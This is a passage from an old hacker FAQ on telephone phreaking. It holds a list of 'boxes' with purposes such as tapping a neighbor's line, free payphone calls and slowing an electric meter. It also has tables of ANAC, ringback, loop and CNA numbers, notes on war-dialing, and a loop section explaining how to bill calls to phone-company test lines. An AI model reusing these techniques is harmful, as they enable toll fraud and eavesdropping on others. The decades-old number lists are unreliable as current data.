                        NOISE        CREATE LINE NOISE
                         OLIVE        EXTERNAL RINGER
              PARTY        CREATE A PARTY LINE FROM 2 PHONE LINES
                          PEARL        TONE GENERATOR
              PINK         CREATE A PARTY LINE FROM 2 PHONE LINES

                                                            #hack FAQ (74/2803)
                      PURPLE       TELEPHONE HOLD BUTTON
     RAINBOW      KILL A TRACE BY PUTTING 120V INTO THE PHONE LINE (JOKE)
                  RAZZ         TAP INTO YOUR NEIGHBORS PHONE
       RED          MAKE FREE PHONE CALLS FROM PAY PHONES BY GENERATING
                                       
                                   QUARTER TONES
                   ROCK         ADD MUSIC TO YOUR PHONE LINE
       SCARLET      CAUSE A NEIGHBORS PHONE LINE TO HAVE POOR RECEPTION
             SILVER       CREATE THE DTMF TONES FOR A, B, C AND D
              STATIC       KEEP THE VOLTAGE ON A PHONE LINE HIGH
         SWITCH       ADD HOLD, INDICATOR LIGHTS, CONFERENCING, ETC..
                TAN          LINE ACTIVATED TELEPHONE RECORDER
      TRON         REVERSE THE PHASE OF POWER TO YOUR HOUSE, CAUSING YOUR
                                       
                            ELECTRIC METER TO RUN SLOWER
                   TV CABLE     "SEE" SOUND WAVES ON YOUR TV
      URINE        CREATE A CAPACITATIVE DISTURBANCE BETWEEN THE RING AND
                                       
                      TIP WIRES IN ANOTHER'S TELEPHONE HEADSET
                 VIOLET       KEEP A PAYPHONE FROM HANGING UP
                       WHITE        PORTABLE DTMF KEYPAD
                      YELLOW       ADD AN EXTENSION PHONE

                                                            #hack FAQ (76/2827)
                          09. WHAT IS AN ANAC NUMBER?
                                       
     AN ANAC (AUTOMATIC NUMBER ANNOUNCEMENT CIRCUIT) NUMBER IS A TELEPHONE
      NUMBER THAT PLAYS BACK THE NUMBER OF THE TELEPHONE THAT CALLED IT.
     ANAC NUMBERS ARE CONVENIENT IF YOU WANT TO KNOW THE TELEPHONE NUMBER
                              OF A PAIR OF WIRES.
                                       
                                       
                   10. WHAT IS THE ANAC NUMBER FOR MY AREA?
                                       
                         HOW TO FIND YOUR ANAC NUMBER:
                                       
    LOOK UP YOUR NPA (AREA CODE) AND TRY THE NUMBER LISTED FOR IT. IF THAT
      FAILS, TRY 1 PLUS THE NUMBER LISTED FOR IT.  IF THAT FAILS, TRY THE
     COMMON NUMBERS LIKE 311, 958 AND 200-222-2222.  IF YOU FIND THE ANAC
                   NUMBER FOR YOUR AREA, PLEASE LET US KNOW.
                                       
         NOTE THAT MANY TIMES THE ANAC NUMBER WILL VARY FOR DIFFERENT
                          SWITCHES IN THE SAME CITY.
                                       
    MANY COMPANIES OPERATE 800 NUMBER SERVICES WHICH WILL READ BACK TO YOU
         THE NUMBER FROM WHICH YOU ARE CALLING.  MANY OF THESE REQUIRE

                                                            #hack FAQ (76/2849)
     NAVIGATING A SERIES OF MENUS TO GET THE PHONE NUMBER YOU ARE LOOKING
                                     FOR.
                                       
                      (800)238-4959   A VOICE MAIL SYSTEM
                       (800)328-2630   A PHONE SEX LINE
    (800)568-3197   INFO ACCESS TELEPHONE COMPANY'S AUTOMATED BLOCKING LINE
                       (800)571-8859   A PHONE SEX LINE
                        (800)692-6447   (800)MY-ANI-IS
          (800)769-3766   DUKE POWER COMPANY AUTOMATED OUTAGE SYSTEM
                                       
     AN NON-800 ANAC THAT WORKS NATIONWIDE IS 404-988-9664.  THE ONE CATCH
       WITH THIS NUMBER IS THAT IT MUST BE DIALED WITH THE AT&T CARRIER
                              ACCESS CODE 10732.
                                       
      PLEASE USE LOCAL ANAC NUMBERS IF YOU CAN, AS ABUSE OR OVERUSE KILLS
                               800 ANAC NUMBERS.
                                       
                        NPA  ANAC NUMBER      COMMENTS
      ---  ---------------  ---------------------------------------------
       201  958              HACKENSACK/JERSEY CITY/NEWARK/PATERSON, NJ
                  202  958-XXXX         DISTRICT OF COLUMBIA
                        203  960              CT (ALL)

                                                            #hack FAQ (76/2871)
                        203  970              CT (ALL)
                     205  908-222-2222     BIRMINGHAM, AL
                  206  411              WA /* NOT US WEST */
                        207  958              ME (ALL)
                      209  830              STOCKTON, CA
                      212  958              MANHATTAN, NY
                     213  114              LOS ANGELES, CA
        213  1223             LOS ANGELES, CA /* SOME 1AESS SWITCHES */
         213  211-2345         LOS ANGELES, CA /* ENGLISH RESPONSE */
           213  211-2346         LOS ANGELES, CA /* DTMF RESPONSE */
                     213  61056            LOS ANGELES, CA
                  214  790              DALLAS, TX /* GTE */
                       214  970-222-2222     DALLAS, TX
           214  970-611-1111     DALLAS, TX /* SOUTHWESTERN BELL */
                    215  410-XXXX         PHILADELPHIA, PA
            217  200-XXX-XXXX     CHAMPAIGN-URBANA/SPRINGFIELD, IL
                301  958-9968         HAGERSTOWN/ROCKVILLE, MD
            305  200-222-2222     FT. LAUDERDALE/KEY WEST/MIAMI, FL
                 309  200-XXX-XXXX     PEORIA/ROCK ISLAND, IL
        310  114              LONG BEACH, CA /* ON MANY GTE SWITCHES */
        310  1223             LONG BEACH, CA /* SOME 1AESS SWITCHES */
          310  211-2345         LONG BEACH, CA /* ENGLISH RESPONSE */

                                                            #hack FAQ (76/2893)
           310  211-2346         LONG BEACH, CA /* DTMF RESPONSE */
                       312  200              CHICAGO, IL
                       312  290              CHICAGO, IL
         312  1-200-8825       CHICAGO, IL (LAST FOUR CHANGE RAPIDLY)
             313  200-200-2002     ANN ARBOR/DEARBORN/DETROIT, MI
             313  200-222-2222     ANN ARBOR/DEARBORN/DETROIT, MI
             313  200-XXX-XXXX     ANN ARBOR/DEARBORN/DETROIT, MI
             313  200200200200200  ANN ARBOR/DEARBORN/DETROIT, MI
          314  410-XXXX#        COLUMBIA/JEFFERSON CITY/ST.LOUIS, MO
          314  511              COLUMBIA/JEFFERSON CITY/ST.LOUIS, MO
                   315  953              SYRACUSE/UTICA, NY
                   315  958              SYRACUSE/UTICA, NY
                 317  310-222-2222     INDIANAPOLIS/KOKOMO, IN
                 317  743-1218         INDIANAPOLIS/KOKOMO, IN
                        401  200-200-4444     RI (ALL)
                        401  222-2222         RI (ALL)
                       402  311              LINCOLN, NE
                       404  311              ATLANTA, GA
                       404  940-XXX-XXXX     ATLANTA, GA
                 405  897              ENID/OKLAHOMA CITY, OK
               407  200-222-2222     ORLANDO/WEST PALM BEACH, FL
                      408  300-XXX-XXXX     SAN JOSE, CA

                                                            #hack FAQ (76/2915)
                      408  760              SAN JOSE, CA
                      408  940              SAN JOSE, CA
                 409  951              BEAUMONT/GALVESTON, TX
                 409  970-XXXX         BEAUMONT/GALVESTON, TX
                 410  200-6969         ANNAPOLIS/BALTIMORE, MD
                 410  200-555-1212     ANNAPOLIS/BALTIMORE, MD
                 410  811              ANNAPOLIS/BALTIMORE, MD
                     412  711-6633         PITTSBURGH, PA
                     412  711-4411         PITTSBURGH, PA
                     412  999-XXXX         PITTSBURGH, PA
               413  958              PITTSFIELD/SPRINGFIELD, MA
               413  200-555-5555     PITTSFIELD/SPRINGFIELD, MA
       414  330-2234         FOND DU LAC/GREEN BAY/MILWAUKEE/RACINE, WI
                    415  200-555-1212     SAN FRANCISCO, CA
                    415  211-2111         SAN FRANCISCO, CA
                    415  2222             SAN FRANCISCO, CA
                    415  640              SAN FRANCISCO, CA
                    415  760-2878         SAN FRANCISCO, CA
                    415  7600-2222        SAN FRANCISCO, CA
                       419  311              TOLEDO, OH
      502  997-555-1212     FRANKFORT/LOUISVILLE/PADUCAH/SHELBYVILLE, KY
        503  611              PORTLAND, OR  /* NOT ALL PARTS OF TOWN */

                                                            #hack FAQ (76/2937)
          508  958              FALL RIVER/NEW BEDFORD/WORCHESTER, MA
          508  200-222-1234     FALL RIVER/NEW BEDFORD/WORCHESTER, MA
          508  200-222-2222     FALL RIVER/NEW BEDFORD/WORCHESTER, MA
             509  560              SPOKANE/WALLA WALLA/YAKIMA, WA
                512  200-222-2222     AUSTIN/CORPUS CHRISTI, TX
                512  830              AUSTIN/CORPUS CHRISTI, TX
                512  970-XXXX         AUSTIN/CORPUS CHRISTI, TX
                     515  5463             DES MOINES, IA
                516  958              HEMPSTEAD/LONG ISLAND, NY
                516  968              HEMPSTEAD/LONG ISLAND, NY
              517  200-222-2222     BAY CITY/JACKSON/LANSING, MI
              517  200200200200200  BAY CITY/JACKSON/LANSING, MI
               518  997              ALBANY/SCHENECTADY/TROY, NY
               518  998              ALBANY/SCHENECTADY/TROY, NY
                       602  593-0809         PHOENIX, AZ
                       602  593-6017         PHOENIX, AZ
                       602  593-7451         PHOENIX, AZ
                        603  200-222-2222     NH (ALL)
                 606  997-555-1212     ASHLAND/WINCHESTER, KY
                  607  993              BINGHAMTON/ELMIRA, NY
        609  958              ATLANTIC CITY/CAMDEN/TRENTON/VINELAND, NJ
                 612  511              MINNEAPOLIS/ST.PAUL, MN

                                                            #hack FAQ (76/2959)
                      615  200200200200200  NASHVILLE, TN
                      615  830              NASHVILLE, TN
         616  200-222-2222     BATTLE CREEK/GRAND RAPIDS/KALAMAZOO, MI
                       617  200-222-1234     BOSTON, MA
                       617  200-222-2222     BOSTON, MA
               617  200-444-4444     BOSTON, MA /* WOBURN, MA */
                       617  220-2622         BOSTON, MA
                       617  958              BOSTON, MA
                618  200-XXX-XXXX     ALTON/CAIRO/MT.VERNON, IL
            703  811              ALEXANDRIA/ARLINGTON/ROANOKE, VA
      708  1-200-8825       CHICAGO/ELGIN, IL (LAST FOUR CHANGE RAPIDLY)
                    708  356-9646         CHICAGO/ELGIN, IL
                       713  970-XXXX         HOUSTON, TX
                  714  211-2121         ANAHEIM, CA /* GTE */
 716  511              BUFFALO/NIAGARA FALLS/ROCHESTER, NY /* ROCHESTER TEL */
          717  958              HARRISBURG/SCRANTON/WILKES-BARRE, PA
         718  958              BRONX/BROOKLYN/QUEENS/STATEN ISLAND, NY
                      802  2-222-222-2222   VERMONT (ALL)
                      802  200-222-2222     VERMONT (ALL)
                   805  830              SAN LUIS OBISPO, CA
                  806  970-XXXX         AMARILLO/LUBBOCK, TX
                        810  200200200200200  MICHIGAN

                                                            #hack FAQ (76/2981)
                     812  410-555-1212     EVANSVILLE, IN
           813  311              FT. MEYERS/ST. PETERSBURG/TAMPA, FL
                  815  200-XXX-XXXX     LA SALLE/ROCKFORD, IL
                  815  290              LA SALLE/ROCKFORD, IL
                   817  211              FT. WORTH/WACO, TX
       817  970-611-1111     FT. WORTH/WACO, TX  /* SOUTHWESTERN BELL */
         818  1223             PASADENA, CA /* SOME 1AESS SWITCHES */
           818  211-2345         PASADENA, CA /* ENGLISH RESPONSE */
            818  211-2346         PASADENA, CA /* DTMF RESPONSE */
             906  1-200-222-2222   MARQUETTE/SAULT STE. MARIE, MI
                    908  958              NEW BRUNSWICK, NJ
    910  311              FAYETTEVILLE/GREENSBORO/RALEIGH/WINSTON-SALEM, NC
    910  988              FAYETTEVILLE/GREENSBORO/RALEIGH/WINSTON-SALEM, NC
     914  990-1111         PEEKSKILL/POUGHKEEPSIE/WHITE PLAINS/YONKERS, NY
                   915  970-XXXX         ABILENE/EL PASO, TX
                       919  711              DURHAM, NC
                                       
                                    CANADA:
                        204  644-XXXX         MANITOBA
                  306  115              SASKATCHEWAN, CANADA
            403  311              ALBERTA, YUKON AND N.W. TERRITORY
            403  908-222-2222     ALBERTA, YUKON AND N.W. TERRITORY

                                                            #hack FAQ (76/3003)
            403  999              ALBERTA, YUKON AND N.W. TERRITORY
                    416  410-XXXX         TORONTO, ONTARIO
                    416  997-XXXX         TORONTO, ONTARIO
                    514  320-XXXX         MONTREAL, QUEBEC
                     519  320-XXXX         LONDON, ONTARIO
                604  1116             BRITISH COLUMBIA, CANADA
                604  1211             BRITISH COLUMBIA, CANADA
                604  211              BRITISH COLUMBIA, CANADA
                     613  320-2232         OTTAWA, ONTARIO
               705  320-XXXX         SAULTE STE. MARIE, ONTARIO
                                       
                                  AUSTRALIA:
                    +61  03-552-4111      VICTORIA 03 AREA
                +61  19123            ALL MAJOR CAPITAL CITIES
                                       
                                UNITED KINGDOM:
                                      175
                                       
                                       
                        11. WHAT IS A RINGBACK NUMBER?
                                       
       A RINGBACK NUMBER IS A NUMBER THAT YOU CALL THAT WILL IMMEDIATELY

                                                            #hack FAQ (76/3025)
                 RING THE TELEPHONE FROM WHICH IT WAS CALLED.
                                       
     IN MOST INSTANCES YOU MUST CALL THE RINGBACK NUMBER, QUICKLY HANG UP
     THE PHONE FOR JUST A SHORT MOMENT AND THEN LET UP ON THE SWITCH, YOU
      WILL THEN GO BACK OFF HOOK AND HEAR A DIFFERENT TONE.  YOU MAY THEN
               HANG UP.  YOU WILL BE CALLED BACK SECONDS LATER.
                                       
                                       
                 12. WHAT IS THE RINGBACK NUMBER FOR MY AREA?
                                       
    AN 'X' MEANS INSERT THOSE NUMBERS FROM THE PHONE NUMBER FROM WHICH YOU
    ARE CALLING.  A '?' MEANS THAT THE NUMBER VARIES FROM SWITCH TO SWITCH
         IN THE AREA, OR CHANGES FROM TIME TO TIME.  TRY ALL POSSIBLE
                                 COMBINATIONS.
                                       
      IF THE RINGBACK FOR YOUR NPA IS NOT LISTED, TRY COMMON ONES SUCH AS
     954, 957 AND 958.  ALSO, TRY USING THE NUMBERS LISTED FOR OTHER NPA'S
                       SERVED BY YOUR TELEPHONE COMPANY.
                                       
       201  551-XXXX         HACKENSACK/JERSEY CITY/NEWARK/PATERSON, NJ
                  202  958-XXXX         DISTRICT OF COLUMBIA
                        203  991-XXXX         CT (ALL)

                                                            #hack FAQ (76/3047)
                      209  890-XXXX         STOCKTON, CA
                     213  1-95X-XXXX       LOS ANGELES, CA
                301  958-XXXX         HAGERSTOWN/ROCKVILLE, MD
                   303  99X-XXXX         GRAND JUNCTION, CO
                       312  511-XXXX         CHICAGO, IL
                       312  511-XXX-XXXX     CHICAGO, IL
                       312  57?-XXXX         CHICAGO, IL
                   315  98X-XXXX         SYRACUSE/UTICA, NY
                 317  777-XXXX         INDIANAPOLIS/KOKOMO, IN
                        401  98?-XXXX         RI (ALL)
               407  988-XXXX         ORLANDO/WEST PALM BEACH, FL
                     412  985-XXXX         PITTSBURGH, PA
       414  977-XXXX         FOND DU LAC/GREEN BAY/MILWAUKEE/RACINE, WI
       414  978-XXXX         FOND DU LAC/GREEN BAY/MILWAUKEE/RACINE, WI
                    415  350-XXXX         SAN FRANCISCO, CA
                        501  721-XXX-XXXX     AR (ALL)
                      502  988              LEXINGTON, KY
               504  9988776655       BATON ROUGE/NEW ORLEANS, LA
                       512  95X-XXXX         AUSTIN, TX
                516  660-XXX-XXXX     HEMPSTEAD/LONG ISLAND, NY
                        601  777-XXXX         MS (ALL)
        609  55?-XXXX         ATLANTIC CITY/CAMDEN/TRENTON/VINELAND, NJ

                                                            #hack FAQ (76/3069)
         616  946-XXXX         BATTLE CREEK/GRAND RAPIDS/KALAMAZOO, MI
                      619  331-XXXX         SAN DIEGO, CA
                      619  332-XXXX         SAN DIEGO, CA
            703  958-XXXX         ALEXANDRIA/ARLINGTON/ROANOKE, VA
            716  981-XXXX         ROCHESTER, NY /* ROCHESTER TEL */
          719  99X-XXXX         COLORADO SPRINGS/LEADVILLE/PUEBLO, CO
                       801  938-XXXX         UTAH (ALL)
                       801  939-XXXX         UTAH (ALL)
    804  260              CHARLOTTESVILLE/NEWPORT NEWS/NORFOLK/RICHMOND, VA
              805  114              BAKERSFIELD/SANTA BARBARA, CA
           813  711              FT. MEYERS/ST. PETERSBURG/TAMPA, FL
                    817  971                /* PRESS 2# */
             906  951-XXX-XXXX     MARQUETTE/SAULT STE. MARIE, MI
                    908  55?-XXXX         NEW BRUNSWICK, NJ
     914  660-XXXX         PEEKSKILL/POUGHKEEPSIE/WHITE PLAINS/YONKERS, NY
                                       
                                    CANADA:
                    416  57X-XXXX         TORONTO, ONTARIO
                    416  99X-XXXX         TORONTO, ONTARIO
                    416  999-XXX-XXXX     TORONTO, ONTARIO
                    514  320-XXX-XXXX     MONTREAL, QUEBEC
                     613  999-XXX-XXXX     OTTAWA, ONTARIO

                                                            #hack FAQ (77/3092)
                                  AUSTRALIA:
                                    +61 199
                                       
                                UNITED KINGDOM:
                                      174
                                       
                                       
                              13. WHAT IS A LOOP?
                                       
         THIS FAQ ANSWER IS EXCERPTED FROM: TONELOC V0.99 USER MANUAL
                                       
                                       
                                       
                                       
                           BY MINOR THREAT & MUCHO MAAS
                                       
     LOOPS ARE A PAIR OF PHONE NUMBERS, USUALLY CONSECUTIVE, LIKE 836-9998
     AND 836-9999.  THEY ARE USED BY THE PHONE COMPANY FOR TESTING.  WHAT
      GOOD DO LOOPS DO US?  WELL, THEY ARE COOL IN A FEW WAYS.  HERE IS A
       SIMPLE USE OF LOOPS.  EACH LOOP HAS TWO ENDS, A 'HIGH' END, AND A
     'LOW' END.  ONE END GIVES A (USUALLY) CONSTANT, LOUD TONE WHEN IT IS
      CALLED. THE OTHER END IS SILENT.  LOOPS DON'T USUALLY RING EITHER.

                                                            #hack FAQ (77/3114)
      WHEN BOTH ENDS ARE CALLED, THE PEOPLE THAT CALLED EACH END CAN TALK
        THROUGH THE LOOP.  SOME LOOPS ARE VOICE FILTERED AND WON'T PASS
      ANYTHING BUT A CONSTANT TONE; THESE AREN'T MUCH USE TO YOU.  HERE'S
    WHAT YOU CAN USE WORKING LOOPS FOR:  BILLING PHONE CALLS!  FIRST, CALL
      THE END THAT GIVES THE LOUD TONE.  THEN IF THE OPERATOR OR SOMEONE
     CALLS THE OTHER END, THE TONE WILL GO QUIET.  ACT LIKE THE PHONE JUST
      RANG AND YOU ANSWERED IT ... SAY "HELLO", "ALLO", "CHOW", "YO", OR
    WHAT THE FUCK EVER.  THE OPERATOR THINKS THAT SHE JUST CALLED YOU, AND
      THAT'S IT!  NOW THE PHONE BILL WILL GO TO THE LOOP, AND YOUR LOCAL
    RBOC WILL GET THE BILL!  USE THIS TECHNIQUE IN MODERATION, OR THE LOOP
     MAY GO DOWN.  LOOPS ARE PROBABLY MOST USEFUL WHEN YOU WANT TO TALK TO
           SOMEONE TO WHOM YOU DON'T WANT TO GIVE YOUR PHONE NUMBER.
                                       
                                       
                        14. WHAT IS A LOOP IN MY AREA?
                                       
        MANY OF THESE LOOPS ARE NO LONGER FUNCTIONAL.  IF YOU ARE LOCAL
      TO ANY OF THESE LOOPS, PLEASE TRY THEM OUT AN E-MAIL ME THE RESULTS
                               OF YOUR RESEARCH.
                                       
                             NPA    HIGH      LOW
                            ---  --------  --------

                                                            #hack FAQ (77/3136)
                            201  228-9929  228-9930
                            201  238-9929  238-9930
                            201  251-9929  251-9930
                            201  254-9929  254-9930
                            201  272-9929  272-9930
                            201  330-9929  330-9930
                            201  333-9929  333-9930
                            201  339-9929  339-9930
                            201  347-9929  347-9930
                            201  376-9929  376-9930
                            201  398-9929  398-9930
                            201  467-9929  467-9930
                            201  528-9929  528-9930
                            201  558-9929  558-9930
                            201  559-9929  559-9930
                            201  560-9929  560-9930
                            201  592-9929  592-9930
                            201  625-9929  625-9930
                            201  631-9929  631-9930
                            201  637-9929  637-9930
                            201  655-9929  655-9930
                            201  666-9929  666-9930

                                                            #hack FAQ (77/3158)
                            201  690-9929  690-9930
                            201  761-9929  761-9930
                            201  762-9929  762-9929
                            201  762-9929  762-9930
                            201  762-9929  762-9929
                            201  763-9929  763-9930
                            201  764-9929  764-9930
                            201  767-9929  767-9930
                            201  768-9929  768-9930
                            201  773-9929  773-9930
                            201  879-9929  879-9930
                            201  946-9929  946-9930
                            201  992-9929  992-9930
                            201  993-9929  993-9930
                            201  994-9929  994-9930
                            213  360-1118  360-1119
                            213  365-1118  365-1119
                            213  455-0002  455-XXXX
                            213  455-0002  455-XXXX
                            213  546-0002  546-XXXX
                            213  546-0002  546-XXXX
                            305  778-9952  778-9951

                                                            #hack FAQ (77/3180)
                            305  964-9951  964-9952
                            312  222-9973  222-9974
                            312  234-9973  234-9974
                            313  224-9996  224-9997
                            313  225-9996  225-9997
                            313  234-9996  234-9997
                            313  237-9996  237-9997
                            313  256-9996  256-9997
                            313  272-9996  272-9997
                            313  273-9996  273-9997
                            313  277-9996  277-9997
                            313  281-9996  281-9997
                            313  292-9996  292-9997
                            313  299-9996  299-9997
                            313  321-9996  321-9997
                            313  326-9996  326-9997
                            313  356-9996  356-9997
                            313  362-9996  362-9997
                            313  369-9996  369-9997
                            313  388-9996  388-9997
                            313  397-9996  397-9997
                            313  399-9996  399-9997

                                                            #hack FAQ (77/3202)
                            313  445-9996  445-9997
                            313  465-9996  465-9997
                            313  471-9996  471-9997
                            313  474-9996  474-9997
                            313  477-9996  477-9997
                            313  478-9996  478-9997
                            313  483-9996  483-9997
                            313  497-9996  497-9997
                            313  526-9996  526-9997
                            313  552-9996  552-9997
                            313  556-9996  556-9997
                            313  561-9996  561-9997
                            313  569-9996  569-9996
                            313  575-9996  575-9997
                            313  577-9996  577-9997
                            313  585-9996  585-9997
                            313  591-9996  591-9997
                            313  621-9996  621-9997
                            313  626-9996  626-9997
                            313  644-9996  644-9997
                            313  646-9996  646-9997
                            313  647-9996  647-9997

                                                            #hack FAQ (77/3224)
                            313  649-9996  649-9997
                            313  663-9996  663-9997
                            313  665-9996  665-9997
                            313  683-9996  683-9997
                            313  721-9996  721-9997
                            313  722-9996  722-9997
                            313  728-9996  728-9997
                            313  731-9996  731-9997
                            313  751-9996  751-9997
                            313  776-9996  776-9997
                            313  781-9996  781-9997
                            313  787-9996  787-9997
                            313  822-9996  822-9997
                            313  833-9996  833-9997
                            313  851-9996  851-9997
                            313  871-9996  871-9997
                            313  875-9996  875-9997
                            313  886-9996  886-9997
                            313  888-9996  888-9997
                            313  898-9996  898-9997
                            313  934-9996  934-9997
                            313  942-9996  942-9997

                                                            #hack FAQ (77/3246)
                            313  963-9996  963-9997
                            313  977-9996  977-9997
                            313  995-9996  995-9997
                            315  673-9995  673-9996
                            315  695-9995  695-9996
                            402  422-0001  422-0002
                            402  422-0005  422-0006
                            402  422-0007  422-0008
                            402  422-0003  422-0004
                            402  422-0005  422-0006
                            402  422-0007  422-0008
                            402  422-0009  ALL-PREF
                            402  422-0003  422-0004
                            402  422-0009  ALL-PREF
                            402  422-0001  422-0002
                            402  572-0003  572-0004
                            517  422-9996  422-9997
                            517  423-9996  423-9997
                            517  455-9996  455-9997
                            517  563-9996  563-9997
                            517  663-9996  663-9997
                            517  851-9996  851-9997

                                                            #hack FAQ (77/3268)
                            609  921-9929  921-9930
                            609  994-9929  994-9930
                            616  997-9996  997-9997
                            616  ALL-PREF  ALL-PREF
                            713  224-1499  759-1799
                            713  324-1499  324-1799
                            713  342-1499  342-1799
                            713  351-1499  351-1799
                            713  354-1499  354-1799
                            713  356-1499  356-1799
                            713  442-1499  442-1799
                            713  447-1499  447-1799
                            713  455-1499  455-1799
                            713  458-1499  458-1799
                            713  462-1499  462-1799
                            713  466-1499  466-1799
                            713  468-1499  468-1799
                            713  469-1499  469-1799
                            713  471-1499  471-1799
                            713  481-1499  481-1799
                            713  482-1499  482-1799
                            713  484-1499  484-1799

                                                            #hack FAQ (77/3290)
                            713  487-1499  487-1799
                            713  489-1499  489-1799
                            713  492-1499  492-1799
                            713  493-1499  493-1799
                            713  524-1499  524-1799
                            713  526-1499  526-1799
                            713  555-1499  555-1799
                            713  661-1499  661-1799
                            713  664-1499  664-1799
                            713  665-1499  665-1799
                            713  666-1499  666-1799
                            713  667-1499  667-1799
                            713  682-1499  976-1799
                            713  771-1499  771-1799
                            713  780-1499  780-1799
                            713  781-1499  997-1799
                            713  960-1499  960-1799
                            713  977-1499  977-1799
                            713  988-1499  988-1799
                            714  535-1118  535-1119
                            714  538-1118  538-1119
                            714  858-1118  858-1119

                                                            #hack FAQ (77/3312)
                            714  879-1118  879-1119
                            805  528-0044  528-0045
                            805  544-0044  544-0045
                            805  773-0044  773-0045
                                 813  385-9971
                            908  776-9930  776-9930
                                       
                                       
                           15. WHAT IS A CNA NUMBER?
                                       
     CNA STANDS FOR CUSTOMER NAME AND ADDRESS.  THE CNA NUMBER IS A PHONE
      NUMBER FOR TELEPHONE COMPANY PERSONNEL TO CALL AND GET THE NAME AND
    ADDRESS FOR A PHONE NUMBER.  IF A TELEPHONE LINEMAN FINDS A PHONE LINE
      HE DOES NOT RECOGNIZE, HE CAN USE THE ANI NUMBER TO FIND IT'S PHONE
      NUMBER AND THEN CALL THE CNA OPERATOR TO SEE WHO OWNS IT AND WHERE
                                  THEY LIVE.
                                       
     NORMAL CNA NUMBERS ARE AVAILABLE ONLY TO TELEPHONE COMPANY PERSONNEL.
       PRIVATE CITIZENS MAY NOW LEGALLY GET CNA INFORMATION FROM PRIVATE
                      COMPANIES.  TWO SUCH COMPANIES ARE:
                                       
                         UNIDIRECTORY    (900)933-3330

                                                            #hack FAQ (77/3334)
                         TELENAME        (900)884-1212
                                       
     NOTE THAT THESE ARE 900 NUMBERS, AND WILL COST YOU APPROXIMATELY ONE
                              DOLLAR PER MINUTE.
                                       
      IF YOU ARE IN 312 OR 708, AMERITECH HAS A PAY-FOR-PLAY CNA SERVICE
    AVAILABLE TO THE GENERAL PUBLIC.  THE NUMBER IS 796-9600.  THE COST IS
                $.35/CALL AND CAN LOOK UP TWO NUMBERS PER CALL.
                                       
                                       
           16. WHAT IS THE TELEPHONE COMPANY CNA NUMBER FOR MY AREA?
                                       
                        203  203-771-8080     CT (ALL)
                614  614-464-0123     COLUMBUS/STEUBENVILLE, OH
           813  813-270-8711     FT. MEYERS/ST. PETERSBURG/TAMPA, FL
                                       
                                       
               17. WHAT ARE SOME NUMBERS THAT ALWAYS RING BUSY?
                                       
                   501  377-99XX                   AR (ALL)
     719  577-6100 TO 577-6200       COLORADO SPRINGS/LEADVILLE/PUEBLO, CO
        906  632-9999                   MARQUETTE/SAULT STE. MARIE, MI

                                                            #hack FAQ (77/3356)
        906  635-9999                   MARQUETTE/SAULT STE. MARIE, MI
                                       
                                       
     18. WHAT ARE SOME NUMBERS THAT TEMPORARILY DISCONNECT PHONE SERVICE?
                                       
             516  480 HEMPSTEAD/LONG ISLAND, NY      (60 SECONDS)
                               603  980 NH (ALL)
                                       
                                       
                             19. WHAT IS SCANNING?
                                       
      SCANNING IS DIALING A LARGE NUMBER OF TELEPHONE NUMBERS IN THE HOPE
             OF FINDING INTERESTING CARRIERS (COMPUTERS) OR TONES.
                                       
        SCANNING CAN BE DONE BY HAND, ALTHOUGH DIALING SEVERAL THOUSAND
     TELEPHONE NUMBERS BY HAND IS EXTREMELY BORING AND TAKES A LONG TIME.
                                       
       MUCH BETTER IS TO USE A SCANNING PROGRAM, SOMETIMES CALLED A WAR
      DIALER OR A DEMON DIALER.  CURRENTLY, THE BEST WAR DIALER AVAILABLE
                       TO PC-DOS USERS IS TONELOC .99B8.
                                       
      A WAR DIALER WILL DIAL A RANGE OF NUMBERS AND LOG WHAT IT FINDS AT

                                                            #hack FAQ (77/3378)
       EACH NUMBER.  YOU CAN THEN ONLY DIAL UP THE NUMBERS THAT THE WAR
                      DIALER MARKED AS CARRIERS OR TONES.
                                       
                                       
                           20. IS SCANNING ILLEGAL?
                                       
                   EXCERPT FROM: 2600, SPRING 1990, PAGE 27:
                                       
                                     -BQ-
      IN SOME PLACES, SCANNING HAS BEEN MADE ILLEGAL.  IT WOULD BE HARD,
    THOUGH, FOR SOMEONE TO FILE A COMPLAINT AGAINST YOU FOR SCANNING SINCE
      THE WHOLE PURPOSE IS TO CALL EVERY NUMBER ONCE AND ONLY ONCE.  IT'S
     NOT LIKELY TO BE THOUGHT OF AS HARASSMENT BY ANYONE WHO GETS A SINGLE
     PHONE CALL FROM A SCANNING COMPUTER.  SOME CENTRAL OFFICES HAVE BEEN
    KNOWN TO REACT STRANGELY WHEN PEOPLE START SCANNING.  SOMETIMES YOU'RE
       UNABLE TO GET A DIALTONE FOR HOURS AFTER YOU START SCANNING.  BUT
    THERE IS NO UNIFORM POLICY.  THE BEST THING TO DO IS TO FIRST FIND OUT
        IF YOU'VE GOT SOME CRAZY LAW SAYING YOU CAN'T DO IT.  IF, AS IS
    LIKELY, THERE IS NO SUCH LAW, THE ONLY WAY TO FIND OUT WHAT HAPPENS IS
                               TO GIVE IT A TRY.
                                     -EQ-
                                       

                                                            #hack FAQ (77/3400)
      IT SHOULD BE NOTED THAT A LAW MAKING SCANNING ILLEGAL WAS RECENTLY
      PASSED IN COLORADO SPRINGS, CO.  IT IS NOW ILLEGAL TO PLACE A CALL
            IN COLORADO SPRINGS WITHOUT THE INTENT TO COMMUNICATE.
                                       
                                       
                 21. WHERE CAN I PURCHASE A LINEMAN'S HANDSET?
                                       
                                 CONTACT EAST
                               335 WILLOW STREET
                         NORTH ANDOVER, MA 01845-5995
                                 (508)682-2000
                                       
                                 JENSEN TOOLS
                              7815 S. 46TH STREET
                            PHOENIX, AZ 85044-5399
                                       
                               TIME MOTION TOOLS
                           12778 BROOKPRINTER PLACE
                                POWAY, CA 92064
                                 (619)679-0303
                                       
                                       

                                                            #hack FAQ (77/3422)
                      22. WHAT ARE THE DTMF FREQUENCIES?
                                       
      DTMF STANDS FOR DUAL TONE MULTI FREQUENCY.  THESE ARE THE TONES YOU
     GET WHEN YOU PRESS A KEY ON YOUR TELEPHONE TOUCHPAD.  THE TONE OF THE
     BUTTON IS THE SUM OF THE COLUMN AND ROW TONES.  THE ABCD KEYS DO NOT
                         EXIST ON STANDARD TELEPHONES.
                                       
                                       
                              1209 1336 1477 1633
                                       
                               697   1    2    3    A
                                       
                               770   4    5    6    B
                                       
                               852   7    8    9    C
                                       
                               941   *    0    #    D
                                       
                                       
                       23. WHAT ARE ALL OF THE * CODES?
                                       
       LOCAL AREA SIGNALLING SERVICES (LASS) AND CUSTOM CALLING FEATURE

                                                            #hack FAQ (77/3444)
                                CONTROL CODES:
                                       
